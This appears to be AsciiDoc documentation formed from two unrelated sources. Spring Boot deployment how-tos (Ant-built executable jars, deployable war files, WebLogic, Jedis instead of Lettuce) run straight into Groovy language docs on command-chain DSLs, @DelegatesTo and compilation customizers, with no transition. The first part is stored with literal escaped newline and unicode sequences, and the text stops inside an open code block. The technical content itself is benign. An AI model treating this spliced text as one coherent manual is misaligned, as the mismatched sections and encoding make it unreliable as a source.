Use the appropriate launcher (such as `JarLauncher` for a jar file) as a `Main-Class`\nattribute in the manifest and specify the other properties it needs as manifest entries --\nprincipally, by setting a `Start-Class` property.\n\nThe following example shows how to build an executable archive with Ant:\n\n[source,xml,indent=0]\n----\n\t<target name=\"build\" depends=\"compile\">\n\t\t<jar destfile=\"target\/${ant.project.name}-${spring-boot.version}.jar\" compress=\"false\">\n\t\t\t<mappedresources>\n\t\t\t\t<fileset dir=\"target\/classes\" \/>\n\t\t\t\t<globmapper from=\"*\" to=\"BOOT-INF\/classes\/*\"\/>\n\t\t\t<\/mappedresources>\n\t\t\t<mappedresources>\n\t\t\t\t<fileset dir=\"src\/main\/resources\" erroronmissingdir=\"false\"\/>\n\t\t\t\t<globmapper from=\"*\" to=\"BOOT-INF\/classes\/*\"\/>\n\t\t\t<\/mappedresources>\n\t\t\t<mappedresources>\n\t\t\t\t<fileset dir=\"${lib.dir}\/runtime\" \/>\n\t\t\t\t<globmapper from=\"*\" to=\"BOOT-INF\/lib\/*\"\/>\n\t\t\t<\/mappedresources>\n\t\t\t<zipfileset src=\"${lib.dir}\/loader\/spring-boot-loader-jar-${spring-boot.version}.jar\" \/>\n\t\t\t<manifest>\n\t\t\t\t<attribute name=\"Main-Class\" value=\"org.springframework.boot.loader.JarLauncher\" \/>\n\t\t\t\t<attribute name=\"Start-Class\" value=\"${start-class}\" \/>\n\t\t\t<\/manifest>\n\t\t<\/jar>\n\t<\/target>\n----\n\nThe {github-code}\/spring-boot-samples\/spring-boot-sample-ant[Ant Sample] has a\n`build.xml` file with a `manual` task that should work if you run it with the following\ncommand:\n\n[indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t$ ant -lib <folder containing ivy-2.2.jar> clean manual\n----\n\nThen you can run the application with the following command:\n\n[indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t$ java -jar target\/*.jar\n----\n\n\n\n[[howto-traditional-deployment]]\n== Traditional Deployment\n\nSpring Boot supports traditional deployment as well as more modern forms of deployment.\nThis section answers common questions about traditional deployment.\n\n\n\n[[howto-create-a-deployable-war-file]]\n=== Create a Deployable War File\n\nWARNING: Because Spring WebFlux does not strictly depend on the Servlet API and\napplications are deployed by default on an embedded Reactor Netty server,\nWar deployment is not supported for WebFlux applications.\n\nThe first step in producing a deployable war file is to provide a\n`SpringBootServletInitializer` subclass and override its `configure` method. Doing so\nmakes use of Spring Framework's Servlet 3.0 support and lets you configure your\napplication when it is launched by the servlet container. Typically, you should update\nyour application's main class to extend `SpringBootServletInitializer`, as shown in the\nfollowing example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@SpringBootApplication\n\tpublic class Application extends SpringBootServletInitializer {\n\n\t\t@Override\n\t\tprotected SpringApplicationBuilder configure(SpringApplicationBuilder application) {\n\t\t\treturn application.sources(Application.class);\n\t\t}\n\n\t\tpublic static void main(String[] args) {\n\t\t\tSpringApplication.run(Application.class, args);\n\t\t}\n\n\t}\n----\n\nThe next step is to update your build configuration such that your project produces a war\nfile rather than a jar file. 
If you use Maven and `spring-boot-starter-parent` (which\nconfigures Maven's war plugin for you), all you need to do is to modify `pom.xml` to\nchange the packaging to war, as follows:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<packaging>war<\/packaging>\n----\n\nIf you use Gradle, you need to modify `build.gradle` to apply the war plugin to the\nproject, as follows:\n\n[source,groovy,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tapply plugin: 'war'\n----\n\nThe final step in the process is to ensure that the embedded servlet container does not\ninterfere with the servlet container to which the war file is deployed. To do so, you\nneed to mark the embedded servlet container dependency as being provided.\n\nIf you use Maven, the following example marks the servlet container (Tomcat, in this\ncase) as being provided:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependencies>\n\t\t<!-- \u2026 -->\n\t\t<dependency>\n\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t<artifactId>spring-boot-starter-tomcat<\/artifactId>\n\t\t\t<scope>provided<\/scope>\n\t\t<\/dependency>\n\t\t<!-- \u2026 -->\n\t<\/dependencies>\n----\n\nIf you use Gradle, the following example marks the servlet container (Tomcat, in this\ncase) as being provided:\n\n[source,groovy,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tdependencies {\n\t\t\/\/ \u2026\n\t\tprovidedRuntime 'org.springframework.boot:spring-boot-starter-tomcat'\n\t\t\/\/ \u2026\n\t}\n----\n\nTIP: `providedRuntime` is preferred to Gradle's `compileOnly` configuration. Among other\nlimitations, `compileOnly` dependencies are not on the test classpath, so any web-based\nintegration tests fail.\n\nIf you use the <<build-tool-plugins.adoc#build-tool-plugins, Spring Boot build tools>>,\nmarking the embedded servlet container dependency as provided produces an executable war\nfile with the provided dependencies packaged in a `lib-provided` directory. This means\nthat, in addition to being deployable to a servlet container, you can also run your\napplication by using `java -jar` on the command line.\n\nTIP: Take a look at Spring Boot's sample applications for a\n{github-code}\/spring-boot-samples\/spring-boot-sample-traditional\/pom.xml[Maven-based\nexample] of the previously described configuration.\n\n\n\n\n[[howto-convert-an-existing-application-to-spring-boot]]\n=== Convert an Existing Application to Spring Boot\nFor a non-web application, it should be easy to convert an existing Spring application to\na Spring Boot application. To do so, throw away the code that creates your\n`ApplicationContext` and replace it with calls to `SpringApplication` or\n`SpringApplicationBuilder`. Spring MVC web applications are generally amenable to first\ncreating a deployable war application and then migrating it later to an executable war\nor jar. 
See the https:\/\/spring.io\/guides\/gs\/convert-jar-to-war\/[Getting\nStarted Guide on Converting a jar to a war].\n\nTo create a deployable war by extending `SpringBootServletInitializer` (for example, in a\nclass called `Application`) and adding the Spring Boot `@SpringBootApplication`\nannotation, use code similar to that shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@SpringBootApplication\n\tpublic class Application extends SpringBootServletInitializer {\n\n\t\t@Override\n\t\tprotected SpringApplicationBuilder configure(SpringApplicationBuilder application) {\n\t\t\t\/\/ Customize the application or call application.sources(...) to add sources\n\t\t\t\/\/ Since our example is itself a @Configuration class (via @SpringBootApplication)\n\t\t\t\/\/ we actually don't need to override this method.\n\t\t\treturn application;\n\t\t}\n\n\t}\n----\n\nRemember that, whatever you put in the `sources` is merely a Spring `ApplicationContext`.\nNormally, anything that already works should work here. There might be some beans you can\nremove later and let Spring Boot provide its own defaults for them, but it should be\npossible to get something working before you need to do that.\n\nStatic resources can be moved to `\/public` (or `\/static` or `\/resources` or\n`\/META-INF\/resources`) in the classpath root. The same applies to `messages.properties`\n(which Spring Boot automatically detects in the root of the classpath).\n\nVanilla usage of Spring `DispatcherServlet` and Spring Security should require no further\nchanges. If you have other features in your application (for instance, using other\nservlets or filters), you may need to add some configuration to your `Application`\ncontext, by replacing those elements from the `web.xml`, as follows:\n\n* A `@Bean` of type `Servlet` or `ServletRegistrationBean` installs that bean in the\ncontainer as if it were a `<servlet\/>` and `<servlet-mapping\/>` in `web.xml`.\n* A `@Bean` of type `Filter` or `FilterRegistrationBean` behaves similarly (as a\n`<filter\/>` and `<filter-mapping\/>`).\n* An `ApplicationContext` in an XML file can be added through an `@ImportResource` in\nyour `Application`. 
Alternatively, simple cases where annotation configuration is\nheavily used already can be recreated in a few lines as `@Bean` definitions.\n\nOnce the war file is working, you can make it executable by adding a `main` method to\nyour `Application`, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tpublic static void main(String[] args) {\n\t\tSpringApplication.run(Application.class, args);\n\t}\n----\n\n[NOTE]\n====\nIf you intend to start your application as a war or as an executable application, you\nneed to share the customizations of the builder in a method that is both available to the\n`SpringBootServletInitializer` callback and in the `main` method in a class similar to the\nfollowing:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@SpringBootApplication\n\tpublic class Application extends SpringBootServletInitializer {\n\n\t\t@Override\n\t\tprotected SpringApplicationBuilder configure(SpringApplicationBuilder builder) {\n\t\t\treturn configureApplication(builder);\n\t\t}\n\n\t\tpublic static void main(String[] args) {\n\t\t\tconfigureApplication(new SpringApplicationBuilder()).run(args);\n\t\t}\n\n\t\tprivate static SpringApplicationBuilder configureApplication(SpringApplicationBuilder builder) {\n\t\t\treturn builder.sources(Application.class).bannerMode(Banner.Mode.OFF);\n\t\t}\n\n\t}\n----\n====\n\nApplications can fall into more than one category:\n\n* Servlet 3.0+ applications with no `web.xml`.\n* Applications with a `web.xml`.\n* Applications with a context hierarchy.\n* Applications without a context hierarchy.\n\nAll of these should be amenable to translation, but each might require slightly different\ntechniques.\n\nServlet 3.0+ applications might translate pretty easily if they already use the Spring\nServlet 3.0+ initializer support classes. Normally, all the code from an existing\n`WebApplicationInitializer` can be moved into a `SpringBootServletInitializer`. If your\nexisting application has more than one `ApplicationContext` (for example, if it uses\n`AbstractDispatcherServletInitializer`) then you might be able to combine all your context\nsources into a single `SpringApplication`. The main complication you might encounter is if\ncombining does not work and you need to maintain the context hierarchy. See the\n<<howto-build-an-application-context-hierarchy, entry on building a hierarchy>> for\nexamples. An existing parent context that contains web-specific features usually\nneeds to be broken up so that all the `ServletContextAware` components are in the child\ncontext.\n\nApplications that are not already Spring applications might be convertible to Spring\nBoot applications, and the previously mentioned guidance may help. However, you may yet\nencounter problems. 
In that case, we suggest\nhttps:\/\/stackoverflow.com\/questions\/tagged\/spring-boot[asking questions on Stack Overflow\nwith a tag of `spring-boot`].\n\n\n\n[[howto-weblogic]]\n=== Deploying a WAR to WebLogic\nTo deploy a Spring Boot application to WebLogic, you must ensure that your servlet\ninitializer *directly* implements `WebApplicationInitializer` (even if you extend from a\nbase class that already implements it).\n\nA typical initializer for WebLogic should resemble the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\timport org.springframework.boot.autoconfigure.SpringBootApplication;\n\timport org.springframework.boot.web.servlet.support.SpringBootServletInitializer;\n\timport org.springframework.web.WebApplicationInitializer;\n\n\t@SpringBootApplication\n\tpublic class MyApplication extends SpringBootServletInitializer implements WebApplicationInitializer {\n\n\t}\n----\n\nIf you use Logback, you also need to tell WebLogic to prefer the packaged version\nrather than the version that was pre-installed with the server. You can do so by adding a\n`WEB-INF\/weblogic.xml` file with the following contents:\n\n[source,xml,indent=0]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<wls:weblogic-web-app\n\t\txmlns:wls=\"http:\/\/xmlns.oracle.com\/weblogic\/weblogic-web-app\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txsi:schemaLocation=\"http:\/\/java.sun.com\/xml\/ns\/javaee\n\t\t\thttp:\/\/java.sun.com\/xml\/ns\/javaee\/ejb-jar_3_0.xsd\n\t\t\thttp:\/\/xmlns.oracle.com\/weblogic\/weblogic-web-app\n\t\t\thttp:\/\/xmlns.oracle.com\/weblogic\/weblogic-web-app\/1.4\/weblogic-web-app.xsd\">\n\t\t<wls:container-descriptor>\n\t\t\t<wls:prefer-application-packages>\n\t\t\t\t<wls:package-name>org.slf4j<\/wls:package-name>\n\t\t\t<\/wls:prefer-application-packages>\n\t\t<\/wls:container-descriptor>\n\t<\/wls:weblogic-web-app>\n----\n\n\n\n[[howto-use-jedis-instead-of-lettuce]]\n=== Use Jedis Instead of Lettuce\nBy default, the Spring Boot starter (`spring-boot-starter-data-redis`) uses\nhttps:\/\/github.com\/lettuce-io\/lettuce-core\/[Lettuce]. You need to exclude that\ndependency and include the https:\/\/github.com\/xetorthio\/jedis\/[Jedis] one instead. 
Spring
Boot manages these dependencies to help make this process as easy as possible.

The following example shows how to do so in Maven:

[source,xml,indent=0,subs="verbatim,quotes,attributes"]
----
	<dependency>
		<groupId>org.springframework.boot</groupId>
		<artifactId>spring-boot-starter-data-redis</artifactId>
		<exclusions>
			<exclusion>
				<groupId>io.lettuce</groupId>
				<artifactId>lettuce-core</artifactId>
			</exclusion>
		</exclusions>
	</dependency>
	<dependency>
		<groupId>redis.clients</groupId>
		<artifactId>jedis</artifactId>
	</dependency>
----

The following example shows how to do so in Gradle:

[source,groovy,indent=0,subs="verbatim,quotes,attributes"]
----
	configurations {
		compile.exclude module: "lettuce-core"
	}

	dependencies {
		compile("redis.clients:jedis")
		// ...
	}
----
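
One way to double-check the swap is to inspect the dependency tree. With Maven, for
example, `lettuce-core` should no longer appear in the output of the following command:

[indent=0,subs="verbatim,quotes,attributes"]
----
	$ mvn dependency:tree -Dincludes=io.lettuce:lettuce-core,redis.clients:jedis
----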
= Domain-Specific Languages

== Command chains

Groovy lets you omit parentheses around the arguments of a
method call for top-level statements. The ``command chain'' feature extends this by allowing us to chain such
parentheses-free method calls, requiring neither parentheses around arguments, nor dots between the chained calls.
The general idea is that a call like `a b c d` will actually be equivalent to `a(b).c(d)`. This
also works with multiple arguments, closure arguments, and even named arguments. Furthermore, such command chains can
also appear on the right-hand side of assignments. Let's have a look at some examples
supported by this syntax:

[source,groovy]
---------------------------------------------------------------------------------------------------------------
include::{projectdir}/src/spec/test/CommandChainsTest.groovy[tags=commandchain_1,indent=0]

include::{projectdir}/src/spec/test/CommandChainsTest.groovy[tags=commandchain_2,indent=0]

include::{projectdir}/src/spec/test/CommandChainsTest.groovy[tags=commandchain_3,indent=0]

include::{projectdir}/src/spec/test/CommandChainsTest.groovy[tags=commandchain_4,indent=0]

include::{projectdir}/src/spec/test/CommandChainsTest.groovy[tags=commandchain_5,indent=0]
---------------------------------------------------------------------------------------------------------------

It is also possible to use methods in the chain which take no arguments,
but in that case, the parentheses are needed:

[source,groovy]
-------------------------------------------------------------------------------------------------
include::{projectdir}/src/spec/test/CommandChainsTest.groovy[tags=commandchain_6,indent=0]
-------------------------------------------------------------------------------------------------

If your command chain contains an odd number of elements, the chain will
be composed of method / arguments, and will end with a final property
access:

[source,groovy]
-------------------------------------------------------------------------------------
include::{projectdir}/src/spec/test/CommandChainsTest.groovy[tags=commandchain_7,indent=0]
-------------------------------------------------------------------------------------

This command chain approach opens up interesting possibilities in terms of the much wider range of DSLs which
can now be written in Groovy.

The above examples illustrate using a command chain based DSL but not how to create one. There are various strategies
that you can use, but to illustrate creating such a DSL, we will show a couple of examples - first using maps and Closures:

[source,groovy]
------------------------------------------------------------------------------------------------------
include::{projectdir}/src/spec/test/CommandChainsTest.groovy[tags=commandchain_impl1,indent=0]
------------------------------------------------------------------------------------------------------
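
For instance, a tiny standalone command chain DSL in the same spirit could look like the
following sketch (`please`, `show`, `the` and `of` are illustrative names, not an existing API):

[source,groovy]
----
// each call returns a map whose values are closures, so that
// `please show the 'height' of 'building'` is parsed as
// `please(show).the('height').of('building')`
def show = { what, owner -> println "showing the $what of the $owner" }
def please = { action ->
    [the: { what ->
        [of: { owner -> action(what, owner) }]
    }]
}

please show the 'height' of 'building'
----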

As a second example, consider how you might write a DSL for simplifying
one of your existing APIs. Maybe you need to put this code in front of
customers, business analysts or testers who might not be hard-core Java
developers. We'll use the `Splitter` from the Google
http://code.google.com/p/guava-libraries/[Guava libraries] project as it
already has a nice Fluent API. Here is how we might use it out of the
box:

[source,groovy]
----------------------------------------------------------------------------------------------------------------
include::{projectdir}/src/spec/test/CommandChainsTest.groovy[tags=commandchain_impl2,indent=0]
include::{projectdir}/src/spec/test/CommandChainsTest.groovy[tags=commandchain_impl2_assert,indent=0]
----------------------------------------------------------------------------------------------------------------

It reads fairly well for a Java developer but if that is not your target
audience or you have many such statements to write, it could be
considered a little verbose. Again, there are many options for writing a
DSL. We'll keep it simple with Maps and Closures. We'll first write a
helper method:

[source,groovy]
------------------------------------------------------------------------------------------------------
include::{projectdir}/src/spec/test/CommandChainsTest.groovy[tags=commandchain_impl3,indent=0]
------------------------------------------------------------------------------------------------------

Now, instead of this line from our original example:

[source,groovy]
----------------------------------------------------------------------------------------------------------------
include::{projectdir}/src/spec/test/CommandChainsTest.groovy[tags=commandchain_impl2_assert,indent=0]
----------------------------------------------------------------------------------------------------------------

we can write this:

[source,groovy]
-----------------------------------------------------
include::{projectdir}/src/spec/test/CommandChainsTest.groovy[tags=commandchain_impl3_assert,indent=0]
-----------------------------------------------------


== Operator overloading (TBD)
== Script base classes (TBD)
== Adding properties to numbers (TBD)
[[section-delegatesto]]
== @DelegatesTo

[[TheDelegatesToannotation-DSLsmadeeasy]]
=== Explaining delegation strategy at compile time

`@groovy.lang.DelegatesTo` is a documentation and compile-time annotation aimed at:

 * documenting APIs that use closures as arguments
 * providing type information for the static type checker and compiler

The Groovy language is a platform of choice for building DSLs. Using
closures, it's quite easy to create custom control structures, and it is
just as simple to create builders. Imagine that you have the following
code:

[source,groovy]
---------------------------------------
include::{projectdir}/src/spec/test/DelegatesToSpecTest.groovy[tags=email_builder_usage,indent=0]
---------------------------------------

One way of implementing this is using the builder strategy, which
implies a method named `email` which accepts a closure as an argument.
The method may delegate subsequent calls to an object that implements
the `from`, `to`, `subject` and `body` methods. Again, `body` is a
method which accepts a closure as an argument and that uses the builder
strategy.

Implementing such a builder is usually done the following way:

[source,groovy]
----------------------------------------------
include::{projectdir}/src/spec/test/DelegatesToSpecTest.groovy[tags=email_method_no_delegatesto,indent=0]
----------------------------------------------

The `EmailSpec` class implements the `from`, `to`, … methods. 
By\ncalling\u00a0`rehydrate`, we\u2019re creating a copy of the closure for which we\nset the\u00a0`delegate`,\u00a0`owner` and\u00a0`thisObject` values. Setting the owner\nand the `this` object is not very important here since we will use the\n`DELEGATE_ONLY` strategy which says that the method calls will be\nresolved only against the delegate of the closure.\n\n[source,groovy]\n----------------------------------------------\ninclude::{projectdir}\/src\/spec\/test\/DelegatesToSpecTest.groovy[tags=emailspec_no_delegatesto,indent=0]\n----------------------------------------------\n\nThe `EmailSpec` class has itself a `body` method accepting a closure that is cloned and executed. This is what\nwe call the builder pattern in Groovy.\n\nOne of the problems with the code that we\u2019ve shown is that the user of\nthe `email` method doesn\u2019t have any information about the methods that\nhe\u2019s allowed to call inside the closure. The only possible information\nis from the method documentation. There are two issues with this: first\nof all, documentation is not always written, and if it is, it\u2019s not\nalways available (javadoc not downloaded, for example). Second, it\ndoesn\u2019t help IDEs. What would be really interesting, here, is for IDEs\nto help the developer by suggesting, once they are in the closure body,\nmethods that exist on the `email` class.\n\nMoreover, if the user calls a method in the closure which is not defined\nby the\u00a0`EmailSpec` class, the IDE should at least issue a warning (because\nit\u2019s very likely that it will break at runtime).\n\nOne more problem with the code above is that it is not compatible with static type checking. Type checking would let\nthe user know if a method call is authorized at compile time instead of runtime, but if you try to perform type\nchecking on this code:\n\n[source,groovy]\n---------------------------------------\ninclude::{projectdir}\/src\/spec\/test\/DelegatesToSpecTest.groovy[tags=email_builder_usage,indent=0]\n---------------------------------------\n\nThen the type checker will know that there\u2019s an\u00a0`email` method accepting\na\u00a0`Closure`, but it will complain for every method call\u00a0*inside* the\nclosure, because\u00a0`from`, for example, is not a method which is defined\nin the class. Indeed, it\u2019s defined in the\u00a0`EmailSpec` class and it has\nabsolutely no hint to help it knowing that the closure delegate will, at\nruntime, be of type\u00a0`EmailSpec`:\n\n[source,groovy]\n---------------------------------------\ninclude::{projectdir}\/src\/spec\/test\/DelegatesToSpecTest.groovy[tags=sendmail_typechecked_nodelegatesto,indent=0]\n---------------------------------------\n\nwill fail compilation with errors like this one:\n\n----\n[Static type checking] - Cannot find matching method MyScript#from(java.lang.String). Please check if the declared type is right and if the method exists.\n @ line 31, column 21.\n from 'dsl-guru@mycompany.com'\n----\n\n[[TheDelegatesToannotation-DelegatesTo]]\n=== @DelegatesTo\n\nFor those reasons, Groovy 2.1 introduced a new annotation\nnamed\u00a0`@DelegatesTo`. 
The goal of this annotation is to solve both the
documentation issue (it lets your IDE know about the expected
methods in the closure body) and the type checking
issue (it gives hints to the compiler about the potential
receivers of method calls in the closure body).

The idea is to annotate the `Closure` parameter of the `email` method:

[source,groovy]
---------------------------------------
include::{projectdir}/src/spec/test/DelegatesToSpecTest.groovy[tags=email_method_delegatesto,indent=0]
---------------------------------------

What we've done here is telling the compiler (or the IDE) that when the
method will be called with a closure, the delegate of this closure will
be set to an object of type `EmailSpec`. But there is still a problem: the
default delegation strategy is not the one which is used in our method.
So we will give more information and tell the compiler (or the IDE) that
the delegation strategy is also changed:

[source,groovy]
---------------------------------------
include::{projectdir}/src/spec/test/DelegatesToSpecTest.groovy[tags=email_method_delegatesto_strategy,indent=0]
---------------------------------------

Now, both the IDE and the type checker (if you are using `@TypeChecked`)
will be aware of the delegate and the delegation strategy. This is very
nice because it will not only allow the IDE to provide smart completion,
but it will also remove errors at compile time that exist only because the
behaviour of the program is normally only known at runtime!

The following code will now pass compilation:

[source,groovy]
---------------------------------------
include::{projectdir}/src/spec/test/DelegatesToSpecTest.groovy[tags=sendmail_typechecked_pass,indent=0]
---------------------------------------

[[TheDelegatesToannotation-DelegatesTomodes]]
=== DelegatesTo modes

`@DelegatesTo` supports multiple modes that we will describe with examples
in this section.

[[TheDelegatesToannotation-Simpledelegation]]
==== Simple delegation

In this mode, the only mandatory parameter is the _value_ which says to
which class we delegate calls. Nothing more. We're telling the compiler
that the type of the delegate will *always* be of the type documented
by `@DelegatesTo` (note that it can be a subclass, but if it is, the
methods defined by the subclass will not be visible to the type
checker).

[source,groovy]
-----------------------------------------------
include::{projectdir}/src/spec/test/DelegatesToSpecTest.groovy[tags=simple_delegation,indent=0]
-----------------------------------------------

[[TheDelegatesToannotation-Delegationstrategy]]
==== Delegation strategy

In this mode, you must specify both the delegate class *and* a
delegation strategy. This must be used if the closure will not be called
with the default delegation strategy, which is `Closure.OWNER_FIRST`.

[source,groovy]
----------------------------------------------------------------------------------
include::{projectdir}/src/spec/test/DelegatesToSpecTest.groovy[tags=delegation_with_strategy,indent=0]
----------------------------------------------------------------------------------
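
As a rough sketch (reusing the `EmailSpec` type from the earlier listings; the included
examples remain the reference), such an annotation simply mirrors what the implementation
does with the closure:

[source,groovy]
----
def email(@DelegatesTo(value = EmailSpec, strategy = Closure.DELEGATE_ONLY) Closure cl) {
    def spec = new EmailSpec()
    // the annotation documents exactly this runtime behaviour
    def code = cl.rehydrate(spec, this, this)
    code.resolveStrategy = Closure.DELEGATE_ONLY
    code()
}
----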

[[TheDelegatesToannotation-Delegatetoparameter]]
==== Delegate to parameter

In this variant, we will tell the compiler that we are delegating to
another parameter of the method. Take the following code:

[source,groovy]
-------------------------------------------------
include::{projectdir}/src/spec/test/DelegatesToSpecTest.groovy[tags=exec_method_no_delegatesto,indent=0]
-------------------------------------------------

Here, the delegate which will be used is *not* created inside the `exec`
method. In fact, we take an argument of the method and delegate to it.
Usage may look like this:

[source,groovy]
-----------------------
include::{projectdir}/src/spec/test/DelegatesToSpecTest.groovy[tags=exec_usage,indent=0]
-----------------------

Each of the method calls is delegated to the `email` parameter. This is
a widely used pattern which is also supported by `@DelegatesTo` using a
companion annotation:

[source,groovy]
---------------------------------------------------------------
include::{projectdir}/src/spec/test/DelegatesToSpecTest.groovy[tags=exec_method_with_delegatesto,indent=0]
---------------------------------------------------------------

A closure is annotated with `@DelegatesTo`, but this time, without
specifying any class. Instead, we're annotating another parameter
with `@DelegatesTo.Target`. The type of the delegate is then determined
at compile time. One could think that we are using the parameter type,
which in this case is `Object`, but this is not true. Take this code:

[source,groovy]
--------------------------------------
include::{projectdir}/src/spec/test/DelegatesToSpecTest.groovy[tags=delegatesto_flow_typing_header,indent=0]
include::{projectdir}/src/spec/test/DelegatesToSpecTest.groovy[tags=delegatesto_flow_typing_footer,indent=0]
--------------------------------------

Remember that this works out of the box *without* having to annotate
with `@DelegatesTo`. However, to make the IDE aware of the delegate
type, or the *type checker* aware of it, we need to add `@DelegatesTo`.
And in this case, it will know that the `Greeter` variable is of
type `Greeter`, so it will not report errors on the _sayHello_
method *even if the exec method doesn't explicitly define the target as
of type Greeter*. This is a very powerful feature, because it prevents
you from writing multiple versions of the same `exec` method for
different receiver types!
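
To illustrate the runtime side of this pattern, here is a minimal self-contained sketch
(`Greeter` and `exec` are illustrative; the included listings show the documented version):

[source,groovy]
----
class Greeter {
    void sayHello() { println 'Hello' }
}

def exec(@DelegatesTo.Target Object target, @DelegatesTo Closure code) {
    code.delegate = target     // delegate to the annotated parameter
    code()
}

exec(new Greeter()) {
    sayHello()                 // resolved against the Greeter delegate
}
----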

In this mode, the `@DelegatesTo` annotation also supports the `strategy`
parameter that we've described above.

[[TheDelegatesToannotation-Multipleclosures]]
==== Multiple closures

In the previous example, the `exec` method accepted only one closure,
but you may have methods that take multiple closures:

[source,groovy]
--------------------------------------------------------------------
include::{projectdir}/src/spec/test/DelegatesToSpecTest.groovy[tags=foobarbaz_method_no_delegatesto,indent=0]
--------------------------------------------------------------------

Then nothing prevents you from annotating each closure
with `@DelegatesTo`:

[source,groovy]
--------------------------------------------------------------------
include::{projectdir}/src/spec/test/DelegatesToSpecTest.groovy[tags=foobarbaz_classes,indent=0]

include::{projectdir}/src/spec/test/DelegatesToSpecTest.groovy[tags=foobarbaz_method_header,indent=0]
 ...
include::{projectdir}/src/spec/test/DelegatesToSpecTest.groovy[tags=foobarbaz_method_footer,indent=0]
--------------------------------------------------------------------

But more importantly, if you have multiple closures *and* multiple
arguments, you can use several targets:

[source,groovy]
-----------------------------------------------------------------------------
include::{projectdir}/src/spec/test/DelegatesToSpecTest.groovy[tags=foobarbaz_multitarget,indent=0]

include::{projectdir}/src/spec/test/DelegatesToSpecTest.groovy[tags=multitarget_test,indent=0]
-----------------------------------------------------------------------------

NOTE: At this point, you may wonder why we don't use the parameter names as
references. The reason is that the information (the parameter name) is
not always available (it's debug-only information), so it's a
limitation of the JVM.

==== Delegating to a generic type

In some situations, it is interesting to instruct the IDE or the compiler that the delegate type will not be a parameter
but a generic type. Imagine a configurator that runs on a list of elements:

[source,groovy]
----
include::{projectdir}/src/spec/test/DelegatesToSpecTest.groovy[tags=configure_list_method,indent=0]
----

Then this method can be called with any list like this:

[source,groovy]
----
include::{projectdir}/src/spec/test/DelegatesToSpecTest.groovy[tags=configure_list_usage,indent=0]
----

To let the type checker and the IDE know that the `configure` method calls the closure on each element of the list, you
need to use `@DelegatesTo` differently:

[source,groovy]
----
include::{projectdir}/src/spec/test/DelegatesToSpecTest.groovy[tags=configure_list_with_delegatesto,indent=0]
----

`@DelegatesTo` takes an optional `genericTypeIndex` argument that gives the index of the generic type to use
as the delegate type. This *must* be used in conjunction with `@DelegatesTo.Target` and the index starts at 0. In
the example above, that means that the delegate type is resolved against `List<T>`, and since the generic type at index
0 is `T` and inferred as a `Realm`, the type checker infers that the delegate type will be of type `Realm`.
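
As a sketch, and under the assumption that the configured elements expose the methods
called in the closure, such a signature can look like this:

[source,groovy]
----
public <T> void configure(
        @DelegatesTo.Target List<T> elements,
        @DelegatesTo(genericTypeIndex = 0) Closure configuration) {
    elements.each { element ->
        // delegate to each element of the list, as documented by genericTypeIndex = 0
        def body = configuration.rehydrate(element, this, this)
        body.resolveStrategy = Closure.DELEGATE_FIRST
        body()
    }
}
----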

NOTE: We're using a `genericTypeIndex` instead of a placeholder (`T`) because of JVM limitations.

[[compilation-customizers]]
== Compilation customizers
=== Introduction

Whether you are using `groovyc` to compile classes or a `GroovyShell`,
for example, to execute scripts, under the hood, a _compiler configuration_ is used. This configuration holds information
like the source encoding or the classpath but it can also be used to perform more operations like adding imports by
default, applying AST transformations transparently or disabling global AST transformations.

The goal of compilation customizers is to make those common tasks easy to implement. For that, the `CompilerConfiguration`
class is the entry point. The general schema will always be based on the following code:

[source,groovy]
--------------------------------------------------------
import org.codehaus.groovy.control.CompilerConfiguration
// create a configuration
def config = new CompilerConfiguration()
// tweak the configuration
config.addCompilationCustomizers(...)
// run your script
def shell = new GroovyShell(config)
shell.evaluate(script)
--------------------------------------------------------

Compilation customizers must extend the _org.codehaus.groovy.control.customizers.CompilationCustomizer_ class. A customizer works:

* on a specific compilation phase
* on _every_ class node being compiled

You can implement your own compilation customizer but Groovy includes some of the most common operations.

=== Import customizer

Using this compilation customizer, your code will have imports added
transparently. This is particularly useful for scripts implementing a
DSL where you want to avoid requiring users to write imports. The
import customizer will let you add all the variants of imports the
Groovy language allows, that is:

* class imports, optionally aliased
* star imports
* static imports, optionally aliased
* static star imports

[source,groovy]
-----------------------------------------------------------------------------------------------------
import org.codehaus.groovy.control.customizers.ImportCustomizer

include::{projectdir}/src/spec/test/CustomizersTest.groovy[tags=import_cz,indent=0]
-----------------------------------------------------------------------------------------------------

A detailed description of all shortcuts can be found in gapi::org.codehaus.groovy.control.customizers.ImportCustomizer
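
For instance, a shell configured with an import customizer can evaluate scripts that
declare no imports at all. The following is a small self-contained sketch of the idea:

[source,groovy]
----
import org.codehaus.groovy.control.CompilerConfiguration
import org.codehaus.groovy.control.customizers.ImportCustomizer

def imports = new ImportCustomizer()
imports.addImports('java.util.concurrent.atomic.AtomicInteger') // class import
imports.addStarImports('java.util.concurrent')                  // star import
imports.addStaticStars('java.lang.Math')                        // static star import

def config = new CompilerConfiguration()
config.addCompilationCustomizers(imports)

// the evaluated script uses AtomicInteger and Math.max without importing them
new GroovyShell(config).evaluate '''
    assert new AtomicInteger(41).incrementAndGet() == max(21, 42)
'''
----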

=== AST transformation customizer

The AST transformation customizer is meant to apply AST transformations
transparently. Unlike global AST transformations that apply on every
class being compiled as long as the transform is found on the classpath
(which has drawbacks like increasing the compilation time or side
effects due to transformations applied where they should not be), the
customizer will allow you to selectively apply a transform only for
specific scripts or classes.

As an example, let's say you want to be able to use `@Log` in a script.
The problem is that `@Log` is normally applied on a class node and a
script, by definition, doesn't require one. But implementation-wise,
scripts are classes, it's just that you cannot annotate this implicit
class node with `@Log`. Using the AST customizer, you have a workaround
to do it:

[source,groovy]
--------------------------------------------------------------------------
